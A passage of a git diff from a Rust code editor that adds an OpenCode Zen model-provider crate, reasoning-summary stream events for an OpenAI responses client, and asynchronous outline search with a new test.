} => false, } @@ -276,12 +295,27 @@ impl Model { } } +#[derive(Debug, Serialize, Deserialize)] +pub struct StreamOptions { + pub include_usage: bool, +} + +impl Default for StreamOptions { + fn default() -> Self { + Self { + include_usage: true, + } + } +} + #[derive(Debug, Serialize, Deserialize)] pub struct Request { pub model: String, pub messages: Vec, pub stream: bool, #[serde(default, skip_serializing_if = "Option::is_none")] + pub stream_options: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] pub max_completion_tokens: Option, #[serde(default, skip_serializing_if = "Vec::is_empty")] pub stop: Vec, diff --git a/crates/open_ai/src/responses.rs b/crates/open_ai/src/responses.rs index 9196b4a11fbaeeabb9ebe7e59cf106c4d260c267..34dbd46c372a672840d6c7c91f4785dbe8d80521 100644 --- a/crates/open_ai/src/responses.rs +++ b/crates/open_ai/src/responses.rs @@ -55,7 +55,14 @@ pub struct ResponseFunctionCallItem { #[derive(Debug, Serialize, Deserialize)] pub struct ResponseFunctionCallOutputItem { pub call_id: String, - pub output: String, + pub output: ResponseFunctionCallOutputContent, +} + +#[derive(Debug, Serialize, Deserialize)] +#[serde(untagged)] +pub enum ResponseFunctionCallOutputContent { + List(Vec), + Text(String), } #[derive(Debug, Clone, Serialize, Deserialize)] @@ -78,6 +85,16 @@ pub enum ResponseInputContent { #[derive(Serialize, Debug)] pub struct ReasoningConfig { pub effort: ReasoningEffort, + #[serde(skip_serializing_if = "Option::is_none")] + pub summary: Option, +} + +#[derive(Serialize, Debug, Clone, Copy, PartialEq, Eq)] +#[serde(rename_all = "lowercase")] +pub enum ReasoningSummaryMode { + Auto, + Concise, + Detailed, } #[derive(Serialize, Debug)] @@ -150,6 +167,30 @@ pub enum StreamEvent { content_index: Option, text: String, }, + #[serde(rename = "response.reasoning_summary_part.added")] + ReasoningSummaryPartAdded { + item_id: String, + output_index: usize, + summary_index: usize, + }, + #[serde(rename = 
"response.reasoning_summary_text.delta")] + ReasoningSummaryTextDelta { + item_id: String, + output_index: usize, + delta: String, + }, + #[serde(rename = "response.reasoning_summary_text.done")] + ReasoningSummaryTextDone { + item_id: String, + output_index: usize, + text: String, + }, + #[serde(rename = "response.reasoning_summary_part.done")] + ReasoningSummaryPartDone { + item_id: String, + output_index: usize, + summary_index: usize, + }, #[serde(rename = "response.function_call_arguments.delta")] FunctionCallArgumentsDelta { item_id: String, @@ -219,6 +260,25 @@ pub struct ResponseUsage { pub enum ResponseOutputItem { Message(ResponseOutputMessage), FunctionCall(ResponseFunctionToolCall), + Reasoning(ResponseReasoningItem), + #[serde(other)] + Unknown, +} + +#[derive(Deserialize, Debug, Clone)] +pub struct ResponseReasoningItem { + #[serde(default)] + pub id: Option, + #[serde(default)] + pub summary: Vec, +} + +#[derive(Deserialize, Debug, Clone)] +#[serde(tag = "type", rename_all = "snake_case")] +pub enum ReasoningSummaryPart { + SummaryText { + text: String, + }, #[serde(other)] Unknown, } @@ -356,6 +416,21 @@ pub async fn stream_response( }); } } + ResponseOutputItem::Reasoning(reasoning) => { + if let Some(ref item_id) = reasoning.id { + for part in &reasoning.summary { + if let ReasoningSummaryPart::SummaryText { text } = part { + all_events.push( + StreamEvent::ReasoningSummaryTextDelta { + item_id: item_id.clone(), + output_index, + delta: text.clone(), + }, + ); + } + } + } + } ResponseOutputItem::Unknown => {} } diff --git a/crates/open_path_prompt/Cargo.toml b/crates/open_path_prompt/Cargo.toml index 3418712abf9656cacd670882c3002cf50b3737d7..e635797cfbe042c327066494a36c3552f6736be1 100644 --- a/crates/open_path_prompt/Cargo.toml +++ b/crates/open_path_prompt/Cargo.toml @@ -24,6 +24,7 @@ editor = {workspace = true, features = ["test-support"]} gpui = {workspace = true, features = ["test-support"]} serde_json.workspace = true theme = {workspace = 
true, features = ["test-support"]} +theme_settings.workspace = true workspace = {workspace = true, features = ["test-support"]} [lints] diff --git a/crates/open_path_prompt/src/file_finder_settings.rs b/crates/open_path_prompt/src/file_finder_settings.rs index 36f05e89bd7a1c73d849e3d72f05a092d0c8ec34..56ea60c20864fc620b43d2e445a1dd7b92edfa65 100644 --- a/crates/open_path_prompt/src/file_finder_settings.rs +++ b/crates/open_path_prompt/src/file_finder_settings.rs @@ -8,6 +8,7 @@ pub struct FileFinderSettings { pub modal_max_width: FileFinderWidth, pub skip_focus_for_active_in_search: bool, pub include_ignored: Option, + pub include_channels: bool, } impl Settings for FileFinderSettings { @@ -23,6 +24,7 @@ impl Settings for FileFinderSettings { settings::IncludeIgnoredContent::Indexed => Some(false), settings::IncludeIgnoredContent::Smart => None, }, + include_channels: file_finder.include_channels.unwrap(), } } } diff --git a/crates/open_path_prompt/src/open_path_prompt_tests.rs b/crates/open_path_prompt/src/open_path_prompt_tests.rs index eba3a3e03be55c210f7b4ebd4fad5abc3842e74b..3acd74bdc456b8616229d30ea1da343073685e30 100644 --- a/crates/open_path_prompt/src/open_path_prompt_tests.rs +++ b/crates/open_path_prompt/src/open_path_prompt_tests.rs @@ -410,7 +410,7 @@ async fn test_open_path_prompt_with_show_hidden(cx: &mut TestAppContext) { fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); state diff --git a/crates/opencode/Cargo.toml b/crates/opencode/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..758d2f2479b9f8be2a2ed53d08e40a5cf510f286 --- /dev/null +++ b/crates/opencode/Cargo.toml @@ -0,0 +1,27 @@ +[package] +name = "opencode" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[lib] 
+path = "src/opencode.rs" +test = false + +[features] +default = [] +schemars = ["dep:schemars"] + +[dependencies] +anyhow.workspace = true +futures.workspace = true +google_ai.workspace = true +http_client.workspace = true +schemars = { workspace = true, optional = true } +serde.workspace = true +serde_json.workspace = true +strum.workspace = true diff --git a/crates/supermaven/LICENSE-GPL b/crates/opencode/LICENSE-GPL similarity index 100% rename from crates/supermaven/LICENSE-GPL rename to crates/opencode/LICENSE-GPL diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs new file mode 100644 index 0000000000000000000000000000000000000000..a44ea7edebe660cbf27dd2d6517fa08b358859d8 --- /dev/null +++ b/crates/opencode/src/opencode.rs @@ -0,0 +1,453 @@ +use anyhow::{Result, anyhow}; +use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream}; +use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest}; +use serde::{Deserialize, Serialize}; +use strum::EnumIter; + +pub const OPENCODE_API_URL: &str = "https://opencode.ai/zen"; + +#[derive(Clone, Copy, Debug, Default, PartialEq, Eq, Serialize, Deserialize)] +#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] +#[serde(rename_all = "snake_case")] +pub enum ApiProtocol { + #[default] + Anthropic, + OpenAiResponses, + OpenAiChat, + Google, +} + +#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] +#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)] +pub enum Model { + // -- Anthropic protocol models -- + #[serde(rename = "claude-opus-4-6")] + ClaudeOpus4_6, + #[serde(rename = "claude-opus-4-5")] + ClaudeOpus4_5, + #[serde(rename = "claude-opus-4-1")] + ClaudeOpus4_1, + #[default] + #[serde(rename = "claude-sonnet-4-6")] + ClaudeSonnet4_6, + #[serde(rename = "claude-sonnet-4-5")] + ClaudeSonnet4_5, + #[serde(rename = "claude-sonnet-4")] + ClaudeSonnet4, + #[serde(rename = "claude-haiku-4-5")] + 
ClaudeHaiku4_5, + #[serde(rename = "claude-3-5-haiku")] + Claude3_5Haiku, + + // -- OpenAI Responses API models -- + #[serde(rename = "gpt-5.4")] + Gpt5_4, + #[serde(rename = "gpt-5.4-pro")] + Gpt5_4Pro, + #[serde(rename = "gpt-5.4-mini")] + Gpt5_4Mini, + #[serde(rename = "gpt-5.4-nano")] + Gpt5_4Nano, + #[serde(rename = "gpt-5.3-codex")] + Gpt5_3Codex, + #[serde(rename = "gpt-5.3-codex-spark")] + Gpt5_3Spark, + #[serde(rename = "gpt-5.2")] + Gpt5_2, + #[serde(rename = "gpt-5.2-codex")] + Gpt5_2Codex, + #[serde(rename = "gpt-5.1")] + Gpt5_1, + #[serde(rename = "gpt-5.1-codex")] + Gpt5_1Codex, + #[serde(rename = "gpt-5.1-codex-max")] + Gpt5_1CodexMax, + #[serde(rename = "gpt-5.1-codex-mini")] + Gpt5_1CodexMini, + #[serde(rename = "gpt-5")] + Gpt5, + #[serde(rename = "gpt-5-codex")] + Gpt5Codex, + #[serde(rename = "gpt-5-nano")] + Gpt5Nano, + + // -- Google protocol models -- + #[serde(rename = "gemini-3.1-pro")] + Gemini3_1Pro, + #[serde(rename = "gemini-3-flash")] + Gemini3Flash, + + // -- OpenAI Chat Completions protocol models -- + #[serde(rename = "minimax-m2.5")] + MiniMaxM2_5, + #[serde(rename = "minimax-m2.5-free")] + MiniMaxM2_5Free, + #[serde(rename = "glm-5")] + Glm5, + #[serde(rename = "kimi-k2.5")] + KimiK2_5, + #[serde(rename = "mimo-v2-pro-free")] + MimoV2ProFree, + #[serde(rename = "mimo-v2-omni-free")] + MimoV2OmniFree, + #[serde(rename = "mimo-v2-flash-free")] + MimoV2FlashFree, + #[serde(rename = "trinity-large-preview-free")] + TrinityLargePreviewFree, + #[serde(rename = "big-pickle")] + BigPickle, + #[serde(rename = "nemotron-3-super-free")] + Nemotron3SuperFree, + + // -- Custom model -- + #[serde(rename = "custom")] + Custom { + name: String, + display_name: Option, + max_tokens: u64, + max_output_tokens: Option, + protocol: ApiProtocol, + }, +} + +impl Model { + pub fn default_fast() -> Self { + Self::ClaudeHaiku4_5 + } + + pub fn id(&self) -> &str { + match self { + Self::ClaudeOpus4_6 => "claude-opus-4-6", + Self::ClaudeOpus4_5 => 
"claude-opus-4-5", + Self::ClaudeOpus4_1 => "claude-opus-4-1", + Self::ClaudeSonnet4_6 => "claude-sonnet-4-6", + Self::ClaudeSonnet4_5 => "claude-sonnet-4-5", + Self::ClaudeSonnet4 => "claude-sonnet-4", + Self::ClaudeHaiku4_5 => "claude-haiku-4-5", + Self::Claude3_5Haiku => "claude-3-5-haiku", + + Self::Gpt5_4 => "gpt-5.4", + Self::Gpt5_4Pro => "gpt-5.4-pro", + Self::Gpt5_4Mini => "gpt-5.4-mini", + Self::Gpt5_4Nano => "gpt-5.4-nano", + Self::Gpt5_3Codex => "gpt-5.3-codex", + Self::Gpt5_3Spark => "gpt-5.3-codex-spark", + Self::Gpt5_2 => "gpt-5.2", + Self::Gpt5_2Codex => "gpt-5.2-codex", + Self::Gpt5_1 => "gpt-5.1", + Self::Gpt5_1Codex => "gpt-5.1-codex", + Self::Gpt5_1CodexMax => "gpt-5.1-codex-max", + Self::Gpt5_1CodexMini => "gpt-5.1-codex-mini", + Self::Gpt5 => "gpt-5", + Self::Gpt5Codex => "gpt-5-codex", + Self::Gpt5Nano => "gpt-5-nano", + + Self::Gemini3_1Pro => "gemini-3.1-pro", + Self::Gemini3Flash => "gemini-3-flash", + + Self::MiniMaxM2_5 => "minimax-m2.5", + Self::MiniMaxM2_5Free => "minimax-m2.5-free", + Self::Glm5 => "glm-5", + Self::KimiK2_5 => "kimi-k2.5", + Self::MimoV2ProFree => "mimo-v2-pro-free", + Self::MimoV2OmniFree => "mimo-v2-omni-free", + Self::MimoV2FlashFree => "mimo-v2-flash-free", + Self::TrinityLargePreviewFree => "trinity-large-preview-free", + Self::BigPickle => "big-pickle", + Self::Nemotron3SuperFree => "nemotron-3-super-free", + + Self::Custom { name, .. 
} => name, + } + } + + pub fn display_name(&self) -> &str { + match self { + Self::ClaudeOpus4_6 => "Claude Opus 4.6", + Self::ClaudeOpus4_5 => "Claude Opus 4.5", + Self::ClaudeOpus4_1 => "Claude Opus 4.1", + Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6", + Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5", + Self::ClaudeSonnet4 => "Claude Sonnet 4", + Self::ClaudeHaiku4_5 => "Claude Haiku 4.5", + Self::Claude3_5Haiku => "Claude Haiku 3.5", + + Self::Gpt5_4 => "GPT 5.4", + Self::Gpt5_4Pro => "GPT 5.4 Pro", + Self::Gpt5_4Mini => "GPT 5.4 Mini", + Self::Gpt5_4Nano => "GPT 5.4 Nano", + Self::Gpt5_3Codex => "GPT 5.3 Codex", + Self::Gpt5_3Spark => "GPT 5.3 Codex Spark", + Self::Gpt5_2 => "GPT 5.2", + Self::Gpt5_2Codex => "GPT 5.2 Codex", + Self::Gpt5_1 => "GPT 5.1", + Self::Gpt5_1Codex => "GPT 5.1 Codex", + Self::Gpt5_1CodexMax => "GPT 5.1 Codex Max", + Self::Gpt5_1CodexMini => "GPT 5.1 Codex Mini", + Self::Gpt5 => "GPT 5", + Self::Gpt5Codex => "GPT 5 Codex", + Self::Gpt5Nano => "GPT 5 Nano", + + Self::Gemini3_1Pro => "Gemini 3.1 Pro", + Self::Gemini3Flash => "Gemini 3 Flash", + + Self::MiniMaxM2_5 => "MiniMax M2.5", + Self::MiniMaxM2_5Free => "MiniMax M2.5 Free", + Self::Glm5 => "GLM 5", + Self::KimiK2_5 => "Kimi K2.5", + Self::MimoV2ProFree => "MiMo V2 Pro Free", + Self::MimoV2OmniFree => "MiMo V2 Omni Free", + Self::MimoV2FlashFree => "MiMo V2 Flash Free", + Self::TrinityLargePreviewFree => "Trinity Large Preview Free", + Self::BigPickle => "Big Pickle", + Self::Nemotron3SuperFree => "Nemotron 3 Super Free", + + Self::Custom { + name, display_name, .. 
+ } => display_name.as_deref().unwrap_or(name), + } + } + + pub fn protocol(&self) -> ApiProtocol { + match self { + Self::ClaudeOpus4_6 + | Self::ClaudeOpus4_5 + | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_6 + | Self::ClaudeSonnet4_5 + | Self::ClaudeSonnet4 + | Self::ClaudeHaiku4_5 + | Self::Claude3_5Haiku => ApiProtocol::Anthropic, + + Self::Gpt5_4 + | Self::Gpt5_4Pro + | Self::Gpt5_4Mini + | Self::Gpt5_4Nano + | Self::Gpt5_3Codex + | Self::Gpt5_3Spark + | Self::Gpt5_2 + | Self::Gpt5_2Codex + | Self::Gpt5_1 + | Self::Gpt5_1Codex + | Self::Gpt5_1CodexMax + | Self::Gpt5_1CodexMini + | Self::Gpt5 + | Self::Gpt5Codex + | Self::Gpt5Nano => ApiProtocol::OpenAiResponses, + + Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, + + Self::MiniMaxM2_5 + | Self::MiniMaxM2_5Free + | Self::Glm5 + | Self::KimiK2_5 + | Self::MimoV2ProFree + | Self::MimoV2OmniFree + | Self::MimoV2FlashFree + | Self::TrinityLargePreviewFree + | Self::BigPickle + | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat, + + Self::Custom { protocol, .. 
} => *protocol, + } + } + + pub fn max_token_count(&self) -> u64 { + match self { + // Anthropic models + Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000, + Self::ClaudeOpus4_5 | Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4 => 200_000, + Self::ClaudeOpus4_1 => 200_000, + Self::ClaudeHaiku4_5 => 200_000, + Self::Claude3_5Haiku => 200_000, + + // OpenAI models + Self::Gpt5_4 | Self::Gpt5_4Pro => 1_050_000, + Self::Gpt5_4Mini | Self::Gpt5_4Nano => 400_000, + Self::Gpt5_3Codex => 400_000, + Self::Gpt5_3Spark => 128_000, + Self::Gpt5_2 | Self::Gpt5_2Codex => 400_000, + Self::Gpt5_1 | Self::Gpt5_1Codex | Self::Gpt5_1CodexMax | Self::Gpt5_1CodexMini => { + 400_000 + } + Self::Gpt5 | Self::Gpt5Codex | Self::Gpt5Nano => 400_000, + + // Google models + Self::Gemini3_1Pro => 1_048_576, + Self::Gemini3Flash => 1_048_576, + + // OpenAI-compatible models + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 196_608, + Self::Glm5 => 200_000, + Self::KimiK2_5 => 262_144, + Self::MimoV2ProFree => 1_048_576, + Self::MimoV2OmniFree | Self::MimoV2FlashFree => 262_144, + Self::TrinityLargePreviewFree => 131_072, + Self::BigPickle => 200_000, + Self::Nemotron3SuperFree => 262_144, + + Self::Custom { max_tokens, .. 
} => *max_tokens, + } + } + + pub fn max_output_tokens(&self) -> Option { + match self { + // Anthropic models + Self::ClaudeOpus4_6 => Some(128_000), + Self::ClaudeSonnet4_6 => Some(64_000), + Self::ClaudeOpus4_5 + | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_5 + | Self::ClaudeSonnet4 + | Self::ClaudeHaiku4_5 => Some(64_000), + Self::Claude3_5Haiku => Some(8_192), + + // OpenAI models + Self::Gpt5_4 + | Self::Gpt5_4Pro + | Self::Gpt5_4Mini + | Self::Gpt5_4Nano + | Self::Gpt5_3Codex + | Self::Gpt5_3Spark + | Self::Gpt5_2 + | Self::Gpt5_2Codex + | Self::Gpt5_1 + | Self::Gpt5_1Codex + | Self::Gpt5_1CodexMax + | Self::Gpt5_1CodexMini + | Self::Gpt5 + | Self::Gpt5Codex + | Self::Gpt5Nano => Some(128_000), + + // Google models + Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536), + + // OpenAI-compatible models + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(65_536), + Self::Glm5 | Self::BigPickle => Some(128_000), + Self::KimiK2_5 => Some(65_536), + Self::MimoV2ProFree => Some(131_072), + Self::MimoV2OmniFree | Self::MimoV2FlashFree => Some(65_536), + Self::TrinityLargePreviewFree | Self::Nemotron3SuperFree => Some(16_384), + + Self::Custom { + max_output_tokens, .. 
+ } => *max_output_tokens, + } + } + + pub fn supports_tools(&self) -> bool { + true + } + + pub fn supports_images(&self) -> bool { + match self { + // Anthropic models support images + Self::ClaudeOpus4_6 + | Self::ClaudeOpus4_5 + | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_6 + | Self::ClaudeSonnet4_5 + | Self::ClaudeSonnet4 + | Self::ClaudeHaiku4_5 + | Self::Claude3_5Haiku => true, + + // OpenAI models support images + Self::Gpt5_4 + | Self::Gpt5_4Pro + | Self::Gpt5_4Mini + | Self::Gpt5_4Nano + | Self::Gpt5_3Codex + | Self::Gpt5_3Spark + | Self::Gpt5_2 + | Self::Gpt5_2Codex + | Self::Gpt5_1 + | Self::Gpt5_1Codex + | Self::Gpt5_1CodexMax + | Self::Gpt5_1CodexMini + | Self::Gpt5 + | Self::Gpt5Codex + | Self::Gpt5Nano => true, + + // Google models support images + Self::Gemini3_1Pro | Self::Gemini3Flash => true, + + // OpenAI-compatible models — conservative default + Self::MiniMaxM2_5 + | Self::MiniMaxM2_5Free + | Self::Glm5 + | Self::KimiK2_5 + | Self::MimoV2ProFree + | Self::MimoV2OmniFree + | Self::MimoV2FlashFree + | Self::TrinityLargePreviewFree + | Self::BigPickle + | Self::Nemotron3SuperFree => false, + + Self::Custom { protocol, .. } => matches!( + protocol, + ApiProtocol::Anthropic + | ApiProtocol::OpenAiResponses + | ApiProtocol::OpenAiChat + | ApiProtocol::Google + ), + } + } +} + +/// Stream generate content for Google models via OpenCode Zen. 
+/// +/// Unlike `google_ai::stream_generate_content()`, this uses: +/// - `/v1/models/{model}` path (not `/v1beta/models/{model}`) +/// - `Authorization: Bearer` header (not `key=` query param) +pub async fn stream_generate_content_zen( + client: &dyn HttpClient, + api_url: &str, + api_key: &str, + request: google_ai::GenerateContentRequest, +) -> Result>> { + let api_key = api_key.trim(); + + let model_id = &request.model.model_id; + + let uri = format!("{api_url}/v1/models/{model_id}:streamGenerateContent?alt=sse"); + + let request_builder = HttpRequest::builder() + .method(Method::POST) + .uri(uri) + .header("Content-Type", "application/json") + .header("Authorization", format!("Bearer {api_key}")); + + let request = request_builder.body(AsyncBody::from(serde_json::to_string(&request)?))?; + let mut response = client.send(request).await?; + if response.status().is_success() { + let reader = BufReader::new(response.into_body()); + Ok(reader + .lines() + .filter_map(|line| async move { + match line { + Ok(line) => { + if let Some(line) = line.strip_prefix("data: ") { + match serde_json::from_str(line) { + Ok(response) => Some(Ok(response)), + Err(error) => { + Some(Err(anyhow!("Error parsing JSON: {error:?}\n{line:?}"))) + } + } + } else { + None + } + } + Err(error) => Some(Err(anyhow!(error))), + } + }) + .boxed()) + } else { + let mut text = String::new(); + response.body_mut().read_to_string(&mut text).await?; + Err(anyhow!( + "error during streamGenerateContent via OpenCode Zen, status code: {:?}, body: {}", + response.status(), + text + )) + } +} diff --git a/crates/outline/Cargo.toml b/crates/outline/Cargo.toml index 905f323624437d988ff9a9eb3bde4f9a7becaa91..2ce031bd4605e6c5dfc32e7f76be7493924af825 100644 --- a/crates/outline/Cargo.toml +++ b/crates/outline/Cargo.toml @@ -22,6 +22,7 @@ picker.workspace = true settings.workspace = true smol.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true 
workspace.workspace = true @@ -38,6 +39,4 @@ project = { workspace = true, features = ["test-support"] } rope.workspace = true serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } -tree-sitter-rust.workspace = true -tree-sitter-typescript.workspace = true workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/outline/src/outline.rs b/crates/outline/src/outline.rs index 454f6f0b578ce25785f0a356251c8af64776772f..af5671632fdac175e5d31ae15c5890d439b7860f 100644 --- a/crates/outline/src/outline.rs +++ b/crates/outline/src/outline.rs @@ -1,8 +1,5 @@ use std::ops::Range; -use std::{ - cmp::{self, Reverse}, - sync::Arc, -}; +use std::{cmp, sync::Arc}; use editor::scroll::ScrollOffset; use editor::{Anchor, AnchorRangeExt, Editor, scroll::Autoscroll}; @@ -17,7 +14,8 @@ use language::{Outline, OutlineItem}; use ordered_float::OrderedFloat; use picker::{Picker, PickerDelegate}; use settings::Settings; -use theme::{ActiveTheme, ThemeSettings}; +use theme::ActiveTheme; +use theme_settings::ThemeSettings; use ui::{ListItem, ListItemSpacing, prelude::*}; use util::ResultExt; use workspace::{DismissDecision, ModalView}; @@ -81,29 +79,37 @@ fn outline_for_editor( cx: &mut App, ) -> Option>>> { let multibuffer = editor.read(cx).buffer().read(cx).snapshot(cx); - let (excerpt_id, _, buffer_snapshot) = multibuffer.as_singleton()?; + let buffer_snapshot = multibuffer.as_singleton()?; let buffer_id = buffer_snapshot.remote_id(); let task = editor.update(cx, |editor, cx| editor.buffer_outline_items(buffer_id, cx)); Some(cx.background_executor().spawn(async move { task.await .into_iter() - .map(|item| OutlineItem { - depth: item.depth, - range: Anchor::range_in_buffer(excerpt_id, item.range), - source_range_for_text: Anchor::range_in_buffer( - excerpt_id, - item.source_range_for_text, - ), - text: item.text, - highlight_ranges: item.highlight_ranges, - name_ranges: item.name_ranges, - body_range: item - .body_range - .map(|r| 
Anchor::range_in_buffer(excerpt_id, r)), - annotation_range: item - .annotation_range - .map(|r| Anchor::range_in_buffer(excerpt_id, r)), + .filter_map(|item| { + Some(OutlineItem { + depth: item.depth, + range: multibuffer.anchor_in_buffer(item.range.start)? + ..multibuffer.anchor_in_buffer(item.range.end)?, + source_range_for_text: multibuffer + .anchor_in_buffer(item.source_range_for_text.start)? + ..multibuffer.anchor_in_buffer(item.source_range_for_text.end)?, + text: item.text, + highlight_ranges: item.highlight_ranges, + name_ranges: item.name_ranges, + body_range: item.body_range.and_then(|r| { + Some( + multibuffer.anchor_in_buffer(r.start)? + ..multibuffer.anchor_in_buffer(r.end)?, + ) + }), + annotation_range: item.annotation_range.and_then(|r| { + Some( + multibuffer.anchor_in_buffer(r.start)? + ..multibuffer.anchor_in_buffer(r.end)?, + ) + }), + }) }) .collect() })) @@ -183,11 +189,10 @@ impl OutlineView { struct OutlineViewDelegate { outline_view: WeakEntity, active_editor: Entity, - outline: Outline, + outline: Arc>, selected_match_index: usize, prev_scroll_position: Option>, matches: Vec, - last_query: String, } enum OutlineRowHighlights {} @@ -202,12 +207,11 @@ impl OutlineViewDelegate { ) -> Self { Self { outline_view, - last_query: Default::default(), matches: Default::default(), selected_match_index: 0, prev_scroll_position: Some(editor.update(cx, |editor, cx| editor.scroll_position(cx))), active_editor: editor, - outline, + outline: Arc::new(outline), } } @@ -280,67 +284,73 @@ impl PickerDelegate for OutlineViewDelegate { window: &mut Window, cx: &mut Context>, ) -> Task<()> { - let selected_index; - if query.is_empty() { + let is_query_empty = query.is_empty(); + if is_query_empty { self.restore_active_editor(window, cx); - self.matches = self - .outline - .items - .iter() - .enumerate() - .map(|(index, _)| StringMatch { - candidate_id: index, - score: Default::default(), - positions: Default::default(), - string: Default::default(), - }) - 
.collect(); - - let (buffer, cursor_offset) = self.active_editor.update(cx, |editor, cx| { - let buffer = editor.buffer().read(cx).snapshot(cx); - let cursor_offset = editor - .selections - .newest::(&editor.display_snapshot(cx)) - .head(); - (buffer, cursor_offset) - }); - selected_index = self - .outline - .items - .iter() - .enumerate() - .map(|(ix, item)| { - let range = item.range.to_offset(&buffer); - let distance_to_closest_endpoint = cmp::min( - (range.start.0 as isize - cursor_offset.0 as isize).abs(), - (range.end.0 as isize - cursor_offset.0 as isize).abs(), - ); - let depth = if range.contains(&cursor_offset) { - Some(item.depth) - } else { - None - }; - (ix, depth, distance_to_closest_endpoint) - }) - .max_by_key(|(_, depth, distance)| (*depth, Reverse(*distance))) - .map(|(ix, _, _)| ix) - .unwrap_or(0); - } else { - self.matches = smol::block_on( - self.outline - .search(&query, cx.background_executor().clone()), - ); - selected_index = self - .matches - .iter() - .enumerate() - .max_by_key(|(_, m)| OrderedFloat(m.score)) - .map(|(ix, _)| ix) - .unwrap_or(0); } - self.last_query = query; - self.set_selected_index(selected_index, !self.last_query.is_empty(), cx); - Task::ready(()) + + let outline = self.outline.clone(); + cx.spawn_in(window, async move |this, cx| { + let matches = if is_query_empty { + outline + .items + .iter() + .enumerate() + .map(|(index, _)| StringMatch { + candidate_id: index, + score: Default::default(), + positions: Default::default(), + string: Default::default(), + }) + .collect() + } else { + outline + .search(&query, cx.background_executor().clone()) + .await + }; + + let _ = this.update(cx, |this, cx| { + this.delegate.matches = matches; + let selected_index = if is_query_empty { + let (buffer, cursor_offset) = + this.delegate.active_editor.update(cx, |editor, cx| { + let snapshot = editor.display_snapshot(cx); + let cursor_offset = editor + .selections + .newest::(&snapshot) + .head(); + (snapshot.buffer().clone(), 
cursor_offset) + }); + this.delegate + .matches + .iter() + .enumerate() + .filter_map(|(ix, m)| { + let item = &this.delegate.outline.items[m.candidate_id]; + let range = item.range.to_offset(&buffer); + range.contains(&cursor_offset).then_some((ix, item.depth)) + }) + .max_by_key(|(ix, depth)| (*depth, cmp::Reverse(*ix))) + .map(|(ix, _)| ix) + .unwrap_or(0) + } else { + this.delegate + .matches + .iter() + .enumerate() + .max_by(|(ix_a, a), (ix_b, b)| { + OrderedFloat(a.score) + .cmp(&OrderedFloat(b.score)) + .then(ix_b.cmp(ix_a)) + }) + .map(|(ix, _)| ix) + .unwrap_or(0) + }; + + this.delegate + .set_selected_index(selected_index, !is_query_empty, cx); + }); + }) } fn confirm( @@ -586,6 +596,246 @@ mod tests { assert_single_caret_at_row(&editor, expected_first_highlighted_row, cx); } + #[gpui::test] + async fn test_outline_empty_query_prefers_deepest_containing_symbol_else_first( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "a.rs": indoc! 
{" + // display line 0 + struct Outer { // display line 1 + fn top(&self) {// display line 2 + let _x = 1;// display line 3 + } // display line 4 + } // display line 5 + + struct Another; // display line 7 + "} + }), + ) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + project.read_with(cx, |project, _| { + project.languages().add(language::rust_lang()) + }); + + let (workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = cx.read(|cx| workspace.read(cx).workspace().clone()); + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + let _buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + let editor = workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + set_single_caret_at_row(&editor, 3, cx); + let outline_view = open_outline_view(&workspace, cx); + cx.run_until_parked(); + let (selected_candidate_id, expected_deepest_containing_candidate_id) = outline_view + .update(cx, |outline_view, cx| { + let delegate = &outline_view.delegate; + let selected_candidate_id = + delegate.matches[delegate.selected_match_index].candidate_id; + let (buffer, cursor_offset) = delegate.active_editor.update(cx, |editor, cx| { + let buffer = editor.buffer().read(cx).snapshot(cx); + let cursor_offset = editor + .selections + .newest::(&editor.display_snapshot(cx)) + .head(); + (buffer, cursor_offset) + }); + let deepest_containing_candidate_id = delegate + .outline + .items + .iter() + .enumerate() + .filter_map(|(ix, item)| { + item.range + .to_offset(&buffer) + .contains(&cursor_offset) + .then_some((ix, item.depth)) + }) + .max_by(|(ix_a, depth_a), (ix_b, 
